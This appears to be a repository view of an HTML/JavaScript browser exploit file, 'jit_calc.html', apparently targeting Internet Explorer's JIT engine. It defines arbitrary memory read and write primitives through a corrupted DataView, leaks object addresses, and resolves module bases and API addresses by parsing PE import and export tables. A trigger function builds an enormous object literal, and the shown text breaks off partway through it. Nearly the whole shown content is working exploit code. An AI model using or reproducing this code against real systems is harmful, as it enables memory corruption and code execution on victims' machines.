/
jit_calc.html
315 lines (209 loc) · 27.5 KB
/
jit_calc.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
<meta http-equiv="x-ua-compatible" content="IE=10">
<script language='javascript'>
var a= [1,2,3];
var ga = new Array(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0);
var ga_addr = 0;
var fo = new Array({},{},{});
var u32 = new Uint32Array(10);
var dv_addr = 0, fo_addr = 0;
var dv;
var ggg;
var stop = false;
function setDataAddress(addr)
{
if (addr >= 0x80000000) {
addr = -(0x100000000 - addr);
}
ga[0x1c / 4] = addr;
}
function read8(addr)
{
setDataAddress(addr);
return DataView.prototype.getUint8.call(dv, 0, true);
}
function read16(addr)
{
setDataAddress(addr);
return DataView.prototype.getUint16.call(dv, 0, true);
}
function read32(addr)
{
setDataAddress(addr);
return DataView.prototype.getUint32.call(dv, 0, true);
}
function readPointer(addr)
{
return read32(addr);
}
function writeString(addr, s) {
var bytes = [];
var i = 0;
for ( ; i < s.length; ++ i ) {
bytes[i] = s.charCodeAt(i);
}
bytes[i] = 0;
writeBytes( addr, bytes );
}
function writeBytes(addr, bytes) {
for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
write32( addr + i, value );
}
for ( ; i < bytes.length; ++ i ) {
write8( addr + i, bytes[i] );
}
}
function write8(addr, v)
{
setDataAddress(addr);
DataView.prototype.setUint8.call(dv, 0, v, true);
}
function write32(addr, v)
{
setDataAddress(addr);
DataView.prototype.setUint32.call(dv, 0, v, true);
}
function writePointer(addr, v)
{
write32(addr, v);
}
function leakObjectAddress(o)
{
fo[0] = o;
return readPointer(fo_addr + 0x38);
}
function strequal(addr, s) {
for ( var i = 0; i < s.length; ++ i ) {
if ( read8(addr + i) != s.charCodeAt(i) )
return false;
}
return true;
}
function getModuleBaseFromIAT(base, name) {
var import_table_offset = read32( base + read32(base + 0x3c) + 0x80 );
var import_table = base + import_table_offset;
var cur_table = import_table;
while ( cur_table < import_table + 0x1000 ) {
var name_addr = base + read32(cur_table + 12);
if ( strequal( name_addr, name ) ) {
var iat = base + read32(cur_table + 16);
var func = readPointer(iat);
while ( 0 == func ) {
iat += 4;
func = readPointer(iat);
}
return getModuleBase( func );
}
cur_table += 20;
}
return 0;
}
function getProcAddress(base, procname) {
var export_table = base + read32( base + read32(base + 0x3c) + 0x78 );
//var export_table = base + read32( base + read32(base + 0x3c) + 0x88 );
var num_functions = read32( export_table + 20 );
var addr_functions = base + read32( export_table + 28 );
var addr_names = base + read32( export_table + 32 );
var addr_ordinals = base + read32( export_table + 36 );
for ( var i = 0; i < num_functions; ++ i ) {
var name_addr = read32( addr_names + i * 4 ) + base;
if ( strequal( name_addr, procname ) ) {
var ordinal = read16( addr_ordinals + i * 2 );
var result = read32( addr_functions + ordinal * 4 ) + base;
return result;
}
}
return 0;
}
function getModuleBase(addr) {
if ( addr % 0x10000 ) {
addr = addr - (addr % 0x10000);
}
var cur_addr = addr;
while ( cur_addr > 0 ) {
if ( (read32(cur_addr) & 0xffff) == 0x5a4d ) {
return cur_addr;
}
cur_addr -= 0x10000;
}
return 0;
}
function func(arr, a2) {
arr[0] = 1;
var bb = {p0:1,p1:1,p2:1,p3:1,p4:1,p5:1,p6:1,p7:1,p8:1,p9:1,p10:1,p11:1,p12:1,p13:1,p14:1,p15:1,p16:1,p17:1,p18:1,p19:1,p20:1,p21:1,p22:1,p23:1,p24:1,p25:1,p26:1,p27:1,p28:1,p29:1,p30:1,p31:1,p32:1,p33:1,p34:1,p35:1,p36:1,p37:1,p38:1,p39:1,p40:1,p41:1,p42:1,p43:1,p44:1,p45:1,p46:1,p47:1,p48:1,p49:1,p50:1,p51:1,p52:1,p53:1,p54:1,p55:1,p56:1,p57:1,p58:1,p59:1,p60:1,p61:1,p62:1,p63:1,p64:1,p65:1,p66:1,p67:1,p68:1,p69:1,p70:1,p71:1,p72:1,p73:1,p74:1,p75:1,p76:1,p77:1,p78:1,p79:1,p80:1,p81:1,p82:1,p83:1,p84:1,p85:1,p86:1,p87:1,p88:1,p89:1,p90:1,p91:1,p92:1,p93:1,p94:1,p95:1,p96:1,p97:1,p98:1,p99:1,p100:1,p101:1,p102:1,p103:1,p104:1,p105:1,p106:1,p107:1,p108:1,p109:1,p110:1,p111:1,p112:1,p113:1,p114:1,p115:1,p116:1,p117:1,p118:1,p119:1,p120:1,p121:1,p122:1,p123:1,p124:1,p125:1,p126:1,p127:1,p128:1,p129:1,p130:1,p131:1,p132:1,p133:1,p134:1,p135:1,p136:1,p137:1,p138:1,p139:1,p140:1,p141:1,p142:1,p143:1,p144:1,p145:1,p146:1,p147:1,p148:1,p149:1,p150:1,p151:1,p152:1,p153:1,p154:1,p155:1,p156:1,p157:1,p158:1,p159:1,p160:1,p161:1,p162:1,p163:1,p164:1,p165:1,p166:1,p167:1,p168:1,p169:1,p170:1,p171:1,p172:1,p173:1,p174:1,p175:1,p176:1,p177:1,p178:1,p179:1,p180:1,p181:1,p182:1,p183:1,p184:1,p185:1,p186:1,p187:1,p188:1,p189:1,p190:1,p191:1,p192:1,p193:1,p194:1,p195:1,p196:1,p197:1,p198:1,p199:1,p200:1,p201:1,p202:1,p203:1,p204:1,p205:1,p206:1,p207:1,p208:1,p209:1,p210:1,p211:1,p212:1,p213:1,p214:1,p215:1,p216:1,p217:1,p218:1,p219:1,p220:1,p221:1,p222:1,p223:1,p224:1,p225:1,p226:1,p227:1,p228:1,p229:1,p230:1,p231:1,p232:1,p233:1,p234:1,p235:1,p236:1,p237:1,p238:1,p239:1,p240:1,p241:1,p242:1,p243:1,p244:1,p245:1,p246:1,p247:1,p248:1,p249:1,p250:1,p251:1,p252:1,p253:1,p254:1,p255:1,p256:1,p257:1,p258:1,p259:1,p260:1,p261:1,p262:1,p263:1,p264:1,p265:1,p266:1,p267:1,p268:1,p269:1,p270:1,p271:1,p272:1,p273:1,p274:1,p275:1,p276:1,p277:1,p278:1,p279:1,p280:1,p281:1,p282:1,p283:1,p284:1,p285:1,p286:1,p287:1,p288:1,p289:1,p290:1,p291:1,p292:1,p293:1,p294:1,p295:1,p296:1,p297:1,p298:1,p299:1,p300:1,p301:1,p302:1,p303:1,p304:1,p305:1,p306:1,p307:1,p308:1,p309:1,p310:1,p311:1,p312:1,p313:1,p314:1,p315:1,p316:1,p317:1,p318:1,p319:1,p320:1,p321:1,p322:1,p323:1,p324:1,p325:1,p326:1,p327:1,p328:1,p329:1,p330:1,p331:1,p332:1,p333:1,p334:1,p335:1,p336:1,p337:1,p338:1,p339:1,p340:1,p341:1,p342:1,p343:1,p344:1,p345:1,p346:1,p347:1,p348:1,p349:1,p350:1,p351:1,p352:1,p353:1,p354:1,p355:1,p356:1,p357:1,p358:1,p359:1,p360:1,p361:1,p362:1,p363:1,p364:1,p365:1,p366:1,p367:1,p368:1,p369:1,p370:1,p371:1,p372:1,p373:1,p374:1,p375:1,p376:1,p377:1,p378:1,p379:1,p380:1,p381:1,p382:1,p383:1,p384:1,p385:1,p386:1,p387:1,p388:1,p389:1,p390:1,p391:1,p392:1,p393:1,p394:1,p395:1,p396:1,p397:1,p398:1,p399:1,p400:1,p401:1,p402:1,p403:1,p404:1,p405:1,p406:1,p407:1,p408:1,p409:1,p410:1,p411:1,p412:1,p413:1,p414:1,p415:1,p416:1,p417:1,p418:1,p419:1,p420:1,p421:1,p422:1,p423:1,p424:1,p425:1,p426:1,p427:1,p428:1,p429:1,p430:1,p431:1,p432:1,p433:1,p434:1,p435:1,p436:1,p437:1,p438:1,p439:1,p440:1,p441:1,p442:1,p443:1,p444:1,p445:1,p446:1,p447:1,p448:1,p449:1,p450:1,p451:1,p452:1,p453:1,p454:1,p455:1,p456:1,p457:1,p458:1,p459:1,p460:1,p461:1,p462:1,p463:1,p464:1,p465:1,p466:1,p467:1,p468:1,p469:1,p470:1,p471:1,p472:1,p473:1,p474:1,p475:1,p476:1,p477:1,p478:1,p479:1,p480:1,p481:1,p482:1,p483:1,p484:1,p485:1,p486:1,p487:1,p488:1,p489:1,p490:1,p491:1,p492:1,p493:1,p494:1,p495:1,p496:1,p497:1,p498:1,p499:1,p500:1,p501:1,p502:1,p503:1,p504:1,p505:1,p506:1,p507:1,p508:1,p509:1,p510:1,p511:1,p512:1,p513:1,p514:1,p515:1,p516:1,p517:1,p518:1,p519:1,p520:1,p521:1,p522:1,p523:1,p524:1,p525:1,p526:1,p527:1,p528:1,p529:1,p530:1,p531:1,p532:1,p533:1,p534:1,p535:1,p536:1,p537:1,p538:1,p539:1,p540:1,p541:1,p542:1,p543:1,p544:1,p545:1,p546:1,p547:1,p548:1,p549:1,p550:1,p551:1,p552:1,p553:1,p554:1,p555:1,p556:1,p557:1,p558:1,p559:1,p560:1,p561:1,p562:1,p563:1,p564:1,p565:1,p566:1,p567:1,p568:1,p569:1,p570:1,p571:1,p572:1,p573:1,p574:1,p575:1,p576:1,p577:1,p578:1,p579:1,p580:1,p581:1,p582:1,p583:1,p584:1,p585:1,p586:1,p587:1,p588:1,p589:1,p590:1,p591:1,p592:1,p593:1,p594:1,p595:1,p596:1,p597:1,p598:1,p599:1,p600:1,p601:1,p602:1,p603:1,p604:1,p605:1,p606:1,p607:1,p608:1,p609:1,p610:1,p611:1,p612:1,p613:1,p614:1,p615:1,p616:1,p617:1,p618:1,p619:1,p620:1,p621:1,p622:1,p623:1,p624:1,p625:1,p626:1,p627:1,p628:1,p629:1,p630:1,p631:1,p632:1,p633:1,p634:1,p635:1,p636:1,p637:1,p638:1,p639:1,p640:1,p641:1,p642:1,p643:1,p644:1,p645:1,p646:1,p647:1,p648:1,p649:1,p650:1,p651:1,p652:1,p653:1,p654:1,p655:1,p656:1,p657:1,p658:1,p659:1,p660:1,p661:1,p662:1,p663:1,p664:1,p665:1,p666:1,p667:1,p668:1,p669:1,p670:1,p671:1,p672:1,p673:1,p674:1,p675:1,p676:1,p677:1,p678:1,p679:1,p680:1,p681:1,p682:1,p683:1,p684:1,p685:1,p686:1,p687:1,p688:1,p689:1,p690:1,p691:1,p692:1,p693:1,p694:1,p695:1,p696:1,p697:1,p698:1,p699:1,p700:1,p701:1,p702:1,p703:1,p704:1,p705:1,p706:1,p707:1,p708:1,p709:1,p710:1,p711:1,p712:1,p713:1,p714:1,p715:1,p716:1,p717:1,p718:1,p719:1,p720:1,p721:1,p722:1,p723:1,p724:1,p725:1,p726:1,p727:1,p728:1,p729:1,p730:1,p731:1,p732:1,p733:1,p734:1,p735:1,p736:1,p737:1,p738:1,p739:1,p740:1,p741:1,p742:1,p743:1,p744:1,p745:1,p746:1,p747:1,p748:1,p749:1,p750:1,p751:1,p752:1,p753:1,p754:1,p755:1,p756:1,p757:1,p758:1,p759:1,p760:1,p761:1,p762:1,p763:1,p764:1,p765:1,p766:1,p767:1,p768:1,p769:1,p770:1,p771:1,p772:1,p773:1,p774:1,p775:1,p776:1,p777:1,p778:1,p779:1,p780:1,p781:1,p782:1,p783:1,p784:1,p785:1,p786:1,p787:1,p788:1,p789:1,p790:1,p791:1,p792:1,p793:1,p794:1,p795:1,p796:1,p797:1,p798:1,p799:1,p800:1,p801:1,p802:1,p803:1,p804:1,p805:1,p806:1,p807:1,p808:1,p809:1,p810:1,p811:1,p812:1,p813:1,p814:1,p815:1,p816:1,p817:1,p818:1,p819:1,p820:1,p821:1,p822:1,p823:1,p824:1,p825:1,p826:1,p827:1,p828:1,p829:1,p830:1,p831:1,p832:1,p833:1,p834:1,p835:1,p836:1,p837:1,p838:1,p839:1,p840:1,p841:1,p842:1,p843:1,p844:1,p845:1,p846:1,p847:1,p848:1,p849:1,p850:1,p851:1,p852:1,p853:1,p854:1,p855:1,p856:1,p857:1,p858:1,p859:1,p860:1,p861:1,p862:1,p863:1,p864:1,p865:1,p866:1,p867:1,p868:1,p869:1,p870:1,p871:1,p872:1,p873:1,p874:1,p875:1,p876:1,p877:1,p878:1,p879:1,p880:1,p881:1,p882:1,p883:1,p884:1,p885:1,p886:1,p887:1,p888:1,p889:1,p890:1,p891:1,p892:1,p893:1,p894:1,p895:1,p896:1,p897:1,p898:1,p899:1,p900:1,p901:1,p902:1,p903:1,p904:1,p905:1,p906:1,p907:1,p908:1,p909:1,p910:1,p911:1,p912:1,p913:1,p914:1,p915:1,p916:1,p917:1,p918:1,p919:1,p920:1,p921:1,p922:1,p923:1,p924:1,p925:1,p926:1,p927:1,p928:1,p929:1,p930:1,p931:1,p932:1,p933:1,p934:1,p935:1,p936:1,p937:1,p938:1,p939:1,p940:1,p941:1,p942:1,p943:1,p944:1,p945:1,p946:1,p947:1,p948:1,p949:1,p950:1,p951:1,p952:1,p953:1,p954:1,p955:1,p956:1,p957:1,p958:1,p959:1,p960:1,p961:1,p962:1,p963:1,p964:1,p965:1,p966:1,p967:1,p968:1,p969:1,p970:1,p971:1,p972:1,p973:1,p974:1,p975:1,p976:1,p977:1,p978:1,p979:1,p980:1,p981:1,p982:1,p983:1,p984:1,p985:1,p986:1,p987:1,p988:1,p989:1,p990:1,p991:1,p992:1,p993:1,p994:1,p995:1,p996:1,p997:1,p998:1,p999:1,p1000:1,p1001:1,p1002:1,p1003:1,p1004:1,p1005:1,p1006:1,p1007:1,p1008:1,p1009:1,p1010:1,p1011:1,p1012:1,p1013:1,p1014:1,p1015:1,p1016:1,p1017:1,p1018:1,p1019:1,p1020:1,p1021:1,p1022:1,p1023:1,p1024:1,p1025:1,p1026:1,p1027:1,p1028:1,p1029:1,p1030:1,p1031:1,p1032:1,p1033:1,p1034:1,p1035:1,p1036:1,p1037:1,p1038:1,p1039:1,p1040:1,p1041:1,p1042:1,p1043:1,p1044:1,p1045:1,p1046:1,p1047:1,p1048:1,p1049:1,p1050:1,p1051:1,p1052:1,p1053:1,p1054:1,p1055:1,p1056:1,p1057:1,p1058:1,p1059:1,p1060:1,p1061:1,p1062:1,p1063:1,p1064:1,p1065:1,p1066:1,p1067:1,p1068:1,p1069:1,p1070:1,p1071:1,p1072:1,p1073:1,p1074:1,p1075:1,p1076:1,p1077:1,p1078:1,p1079:1,p1080:1,p1081:1,p1082:1,p1083:1,p1084:1,p1085:1,p1086:1,p1087:1,p1088:1,p1089:1,p1090:1,p1091:1,p1092:1,p1093:1,p1094:1,p1095:1,p1096:1,p1097:1,p1098:1,p1099:1,p1100:1,p1101:1,p1102:1,p1103:1,p1104:1,p1105:1,p1106:1,p1107:1,p1108:1,p1109:1,p1110:1,p1111:1,p1112:1,p1113:1,p1114:1,p1115:1,p1116:1,p1117:1,p1118:1,p1119:1,p1120:1,p1121:1,p1122:1,p1123:1,p1124:1,p1125:1,p1126:1,p1127:1,p1128:1,p1129:1,p1130:1,p1131:1,p1132:1,p1133:1,p1134:1,p1135:1,p1136:1,p1137:1,p1138:1,p1139:1,p1140:1,p1141:1,p1142:1,p1143:1,p1144:1,p1145:1,p1146:1,p1147:1,p1148:1,p1149:1,p1150:1,p1151:1,p1152:1,p1153:1,p1154:1,p1155:1,p1156:1,p1157:1,p1158:1,p1159:1,p1160:1,p1161:1,p1162:1,p1163:1,p1164:1,p1165:1,p1166:1,p1167:1,p1168:1,p1169:1,p1170:1,p1171:1,p1172:1,p1173:1,p1174:1,p1175:1,p1176:1,p1177:1,p1178:1,p1179:1,p1180:1,p1181:1,p1182:1,p1183:1,p1184:1,p1185:1,p1186:1,p1187:1,p1188:1,p1189:1,p1190:1,p1191:1,p1192:1,p1193:1,p1194:1,p1195:1,p1196:1,p1197:1,p1198:1,p1199:1,p1200:1,p1201:1,p1202:1,p1203:1,p1204:1,p1205:1,p1206:1,p1207:1,p1208:1,p1209:1,p1210:1,p1211:1,p1212:1,p1213:1,p1214:1,p1215:1,p1216:1,p1217:1,p1218:1,p1219:1,p1220:1,p1221:1,p1222:1,p1223:1,p1224:1,p1225:1,p1226:1,p1227:1,p1228:1,p1229:1,p1230:1,p1231:1,p1232:1,p1233:1,p1234:1,p1235:1,p1236:1,p1237:1,p1238:1,p1239:1,p1240:1,p1241:1,p1242:1,p1243:1,p1244:1,p1245:1,p1246:1,p1247:1,p1248:1,p1249:1,p1250:1,p1251:1,p1252:1,p1253:1,p1254:1,p1255:1,p1256:1,p1257:1,p1258:1,p1259:1,p1260:1,p1261:1,p1262:1,p1263:1,p1264:1,p1265:1,p1266:1,p1267:1,p1268:1,p1269:1,p1270:1,p1271:1,p1272:1,p1273:1,p1274:1,p1275:1,p1276:1,p1277:1,p1278:1,p1279:1,p1280:1,p1281:1,p1282:1,p1283:1,p1284:1,p1285:1,p1286:1,p1287:1,p1288:1,p1289:1,p1290:1,p1291:1,p1292:1,p1293:1,p1294:1,p1295:1,p1296:1,p1297:1,p1298:1,p1299:1,p1300:1,p1301:1,p1302:1,p1303:1,p1304:1,p1305:1,p1306:1,p1307:1,p1308:1,p1309:1,p1310:1,p1311:1,p1312:1,p1313:1,p1314:1,p1315:1,p1316:1,p1317:1,p1318:1,p1319:1,p1320:1,p1321:1,p1322:1,p1323:1,p1324:1,p1325:1,p1326:1,p1327:1,p1328:1,p1329:1,p1330:1,p1331:1,p1332:1,p1333:1,p1334:1,p1335:1,p1336:1,p1337:1,p1338:1,p1339:1,p1340:1,p1341:1,p1342:1,p1343:1,p1344:1,p1345:1,p1346:1,p1347:1,p1348:1,p1349:1,p1350:1,p1351:1,p1352:1,p1353:1,p1354:1,p1355:1,p1356:1,p1357:1,p1358:1,p1359:1,p1360:1,p1361:1,p1362:1,p1363:1,p1364:1,p1365:1,p1366:1,p1367:1,p1368:1,p1369:1,p1370:1,p1371:1,p1372:1,p1373:1,p1374:1,p1375:1,p1376:1,p1377:1,p1378:1,p1379:1,p1380:1,p1381:1,p1382:1,p1383:1,p1384:1,p1385:1,p1386:1,p1387:1,p1388:1,p1389:1,p1390:1,p1391:1,p1392:1,p1393:1,p1394:1,p1395:1,p1396:1,p1397:1,p1398:1,p1399:1,p1400:1,p1401:1,p1402:1,p1403:1,p1404:1,p1405:1,p1406:1,p1407:1,p1408:1,p1409:1,p1410:1,p1411:1,p1412:1,p1413:1,p1414:1,p1415:1,p1416:1,p1417:1,p1418:1,p1419:1,p1420:1,p1421:1,p1422:1,p1423:1,p1424:1,p1425:1,p1426:1,p1427:1,p1428:1,p1429:1,p1430:1,p1431:1,p1432:1,p1433:1,p1434:1,p1435:1,p1436:1,p1437:1,p1438:1,p1439:1,p1440:1,p1441:1,p1442:1,p1443:1,p1444:1,p1445:1,p1446:1,p1447:1,p1448:1,p1449:1,p1450:1,p1451:1,p1452:1,p1453:1,p1454:1,p1455:1,p1456:1,p1457:1,p1458:1,p1459:1,p1460:1,p1461:1,p1462:1,p1463:1,p1464:1,p1465:1,p1466:1,p1467:1,p1468:1,p1469:1,p1470:1,p1471:1,p1472:1,p1473:1,p1474:1,p1475:1,p1476:1,p1477:1,p1478:1,p1479:1,p1480:1,p1481:1,p1482:1,p1483:1,p1484:1,p1485:1,p1486:1,p1487:1,p1488:1,p1489:1,p1490:1,p1491:1,p1492:1,p1493:1,p1494:1,p1495:1,p1496:1,p1497:1,p1498:1,p1499:1,p1500:1,p1501:1,p1502:1,p1503:1,p1504:1,p1505:1,p1506:1,p1507:1,p1508:1,p1509:1,p1510:1,p1511:1,p1512:1,p1513:1,p1514:1,p1515:1,p1516:1,p1517:1,p1518:1,p1519:1,p1520:1,p1521:1,p1522:1,p1523:1,p1524:1,p1525:1,p1526:1,p1527:1,p1528:1,p1529:1,p1530:1,p1531:1,p1532:1,p1533:1,p1534:1,p1535:1,p1536:1,p1537:1,p1538:1,p1539:1,p1540:1,p1541:1,p1542:1,p1543:1,p1544:1,p1545:1,p1546:1,p1547:1,p1548:1,p1549:1,p1550:1,p1551:1,p1552:1,p1553:1,p1554:1,p1555:1,p1556:1,p1557:1,p1558:1,p1559:1,p1560:1,p1561:1,p1562:1,p1563:1,p1564:1,p1565:1,p1566:1,p1567:1,p1568:1,p1569:1,p1570:1,p1571:1,p1572:1,p1573:1,p1574:1,p1575:1,p1576:1,p1577:1,p1578:1,p1579:1,p1580:1,p1581:1,p1582:1,p1583:1,p1584:1,p1585:1,p1586:1,p1587:1,p1588:1,p1589:1,p1590:1,p1591:1,p1592:1,p1593:1,p1594:1,p1595:1,p1596:1,p1597:1,p1598:1,p1599:1,p1600:1,p1601:1,p1602:1,p1603:1,p1604:1,p1605:1,p1606:1,p1607:1,p1608:1,p1609:1,p1610:1,p1611:1,p1612:1,p1613:1,p1614:1,p1615:1,p1616:1,p1617:1,p1618:1,p1619:1,p1620:1,p1621:1,p1622:1,p1623:1,p1624:1,p1625:1,p1626:1,p1627:1,p1628:1,p1629:1,p1630:1,p1631:1,p1632:1,p1633:1,p1634:1,p1635:1,p1636:1,p1637:1,p1638:1,p1639:1,p1640:1,p1641:1,p1642:1,p1643:1,p1644:1,p1645:1,p1646:1,p1647:1,p1648:1,p1649:1,p1650:1,p1651:1,p1652:1,p1653:1,p1654:1,p1655:1,p1656:1,p1657:1,p1658:1,p1659:1,p1660:1,p1661:1,p1662:1,p1663:1,p1664:1,p1665:1,p1666:1,p1667:1,p1668:1,p1669:1,p1670:1,p1671:1,p1672:1,p1673:1,p1674:1,p1675:1,p1676:1,p1677:1,p1678:1,p1679:1,p1680:1,p1681:1,p1682:1,p1683:1,p1684:1,p1685:1,p1686:1,p1687:1,p1688:1,p1689:1,p1690:1,p1691:1,p1692:1,p1693:1,p1694:1,p1695:1,p1696:1,p1697:1,p1698:1,p1699:1,p1700:1,p1701:1,p1702:1,p1703:1,p1704:1,p1705:1,p1706:1,p1707:1,p1708:1,p1709:1,p1710:1,p1711:1,p1712:1,p1713:1,p1714:1,p1715:1,p1716:1,p1717:1,p1718:1,p1719:1,p1720:1,p1721:1,p1722:1,p1723:1,p1724:1,p1725:1,p1726:1,p1727:1,p1728:1,p1729:1,p1730:1,p1731:1,p1732:1,p1733:1,p1734:1,p1735:1,p1736:1,p1737:1,p1738:1,p1739:1,p1740:1,p1741:1,p1742:1,p1743:1,p1744:1,p1745:1,p1746:1,p1747:1,p1748:1,p1749:1,p1750:1,p1751:1,p1752:1,p1753:1,p1754:1,p1755:1,p1756:1,p1757:1,p1758:1,p1759:1,p1760:1,p1761:1,p1762:1,p1763:1,p1764:1,p1765:1,p1766:1,p1767:1,p1768:1,p1769:1,p1770:1,p1771:1,p1772:1,p1773:1,p1774:1,p1775:1,p1776:1,p1777:1,p1778:1,p1779:1,p1780:1,p1781:1,p1782:1,p1783:1,p1784:1,p1785:1,p1786:1,p1787:1,p1788:1,p1789:1,p1790:1,p1791:1,p1792:1,p1793:1,p1794:1,p1795:1,p1796:1,p1797:1,p1798:1,p1799:1,p1800:1,p1801:1,p1802:1,p1803:1,p1804:1,p1805:1,p1806:1,p1807:1,p1808:1,p1809:1,p1810:1,p1811:1,p1812:1,p1813:1,p1814:1,p1815:1,p1816:1,p1817:1,p1818:1,p1819:1,p1820:1,p1821:1,p1822:1,p1823:1,p1824:1,p1825:1,p1826:1,p1827:1,p1828:1,p1829:1,p1830:1,p1831:1,p1832:1,p1833:1,p1834:1,p1835:1,p1836:1,p1837:1,p1838:1,p1839:1,p1840:1,p1841:1,p1842:1,p1843:1,p1844:1,p1845:1,p1846:1,p1847:1,p1848:1,p1849:1,p1850:1,p1851:1,p1852:1,p1853:1,p1854:1,p1855:1,p1856:1,p1857:1,p1858:1,p1859:1,p1860:1,p1861:1,p1862:1,p1863:1,p1864:1,p1865:1,p1866:1,p1867:1,p1868:1,p1869:1,p1870:1,p1871:1,p1872:1,p1873:1,p1874:1,p1875:1,p1876:1,p1877:1,p1878:1,p1879:1,p1880:1,p1881:1,p1882:1,p1883:1,p1884:1,p1885:1,p1886:1,p1887:1,p1888:1,p1889:1,p1890:1,p1891:1,p1892:1,p1893:1,p1894:1,p1895:1,p1896:1,p1897:1,p1898:1,p1899:1,p1900:1,p1901:1,p1902:1,p1903:1,p1904:1,p1905:1,p1906:1,p1907:1,p1908:1,p1909:1,p1910:1,p1911:1,p1912:1,p1913:1,p1914:1,p1915:1,p1916:1,p1917:1,p1918:1,p1919:1,p1920:1,p1921:1,p1922:1,p1923:1,p1924:1,p1925:1,p1926:1,p1927:1,p1928:1,p1929:1,p1930:1,p1931:1,p1932:1,p1933:1,p1934:1,p1935:1,p1936:1,p1937:1,p1938:1,p1939:1,p1940:1,p1941:1,p1942:1,p1943:1,p1944:1,p1945:1,p1946:1,p1947:1,p1948:1,p1949:1,p1950:1,p1951:1,p1952:1,p1953:1,p1954:1,p1955:1,p1956:1,p1957:1,p1958:1,p1959:1,p1960:1,p1961:1,p1962:1,p1963:1,p1964:1,p1965:1,p1966:1,p1967:1,p1968:1,p1969:1,p1970:1,p1971:1,p1972:1,p1973:1,p1974:1,p1975:1,p1976:1,p1977:1,p1978:1,p1979:1,p1980:1,p1981:1,p1982:1,p1983:1,p1984:1,p1985:1,p1986:1,p1987:1,p1988:1,p1989:1,p1990:1,p1991:1,p1992:1,p1993:1,p1994:1,p1995:1,p1996:1,p1997:1,p1998:1,p1999:1,p2000:1,p2001:1,p2002:1,p2003:1,p2004:1,p2005:1,p2006:1,p2007:1,p2008:1,p2009:1,p2010:1,p2011:1,p2012:1,p2013:1,p2014:1,p2015:1,p2016:1,p2017:1,p2018:1,p2019:1,p2020:1,p2021:1,p2022:1,p2023:1,p2024:1,p2025:1,p2026:1,p2027:1,p2028:1,p2029:1,p2030:1,p2031:1,p2032:1,p2033:1,p2034:1,p2035:1,p2036:1,p2037:1,p2038:1,p2039:1,p2040:1,p2041:1,p2042:1,p2043:1,p2044:1,p2045:1,p2046:1,p2047:1,p2048:1,p2049:1,p2050:1,p2051:1,p2052:1,p2053:1,p2054:1,p2055:1,p2056:1,p2057:1,p2058:1,p2059:1,p2060:1,p2061:1,p2062:1,p2063:1,p2064:1,p2065:1,p2066:1,p2067:1,p2068:1,p2069:1,p2070:1,p2071:1,p2072:1,p2073:1,p2074:1,p2075:1,p2076:1,p2077:1,p2078:1,p2079:1,p2080:1,p2081:1,p2082:1,p2083:1,p2084:1,p2085:1,p2086:1,p2087:1,p2088:1,p2089:1,p2090:1,p2091:1,p2092:1,p2093:1,p2094:1,p2095:1,p2096:1,p2097:1,p2098:1,p2099:1,p2100:1,p2101:1,p2102:1,p2103:1,p2104:1,p2105:1,p2106:1,p2107:1,p2108:1,p2109:1,p2110:1,p2111:1,p2112:1,p2113:1,p2114:1,p2115:1,p2116:1,p2117:1,p2118:1,p2119:1,p2120:1,p2121:1,p2122:1,p2123:1,p2124:1,p2125:1,p2126:1,p2127:1,p2128:1,p2129:1,p2130:1,p2131:1,p2132:1,p2133:1,p2134:1,p2135:1,p2136:1,p2137:1,p2138:1,p2139:1,p2140:1,p2141:1,p2142:1,p2143:1,p2144:1,p2145:1,p2146:1,p2147:1,p2148:1,p2149:1,p2150:1,p2151:1,p2152:1,p2153:1,p2154:1,p2155:1,p2156:1,p2157:1,p2158:1,p2159:1,p2160:1,p2161:1,p2162:1,p2163:1,p2164:1,p2165:1,p2166:1,p2167:1,p2168:1,p2169:1,p2170:1,p2171:1,p2172:1,p2173:1,p2174:1,p2175:1,p2176:1,p2177:1,p2178:1,p2179:1,p2180:1,p2181:1,p2182:1,p2183:1,p2184:1,p2185:1,p2186:1,p2187:1,p2188:1,p2189:1,p2190:1,p2191:1,p2192:1,p2193:1,p2194:1,p2195:1,p2196:1,p2197:1,p2198:1,p2199:1,p2200:1,p2201:1,p2202:1,p2203:1,p2204:1,p2205:1,p2206:1,p2207:1,p2208:1,p2209:1,p2210:1,p2211:1,p2212:1,p2213:1,p2214:1,p2215:1,p2216:1,p2217:1,p2218:1,p2219:1,p2220:1,p2221:1,p2222:1,p2223:1,p2224:1,p2225:1,p2226:1,p2227:1,p2228:1,p2229:1,p2230:1,p2231:1,p2232:1,p2233:1,p2234:1,p2235:1,p2236:1,p2237:1,p2238:1,p2239:1,p2240:1,p2241:1,p2242:1,p2243:1,p2244:1,p2245:1,p2246:1,p2247:1,p2248:1,p2249:1,p2250:1,p2251:1,p2252:1,p2253:1,p2254:1,p2255:1,p2256:1,p2257:1,p2258:1,p2259:1,p2260:1,p2261:1,p2262:1,p2263:1,p2264:1,p2265:1,p2266:1,p2267:1,p2268:1,p2269:1,p2270:1,p2271:1,p2272:1,p2273:1,p2274:1,p2275:1,p2276:1,p2277:1,p2278:1,p2279:1,p2280:1,p2281:1,p2282:1,p2283:1,p2284:1,p2285:1,p2286:1,p2287:1,p2288: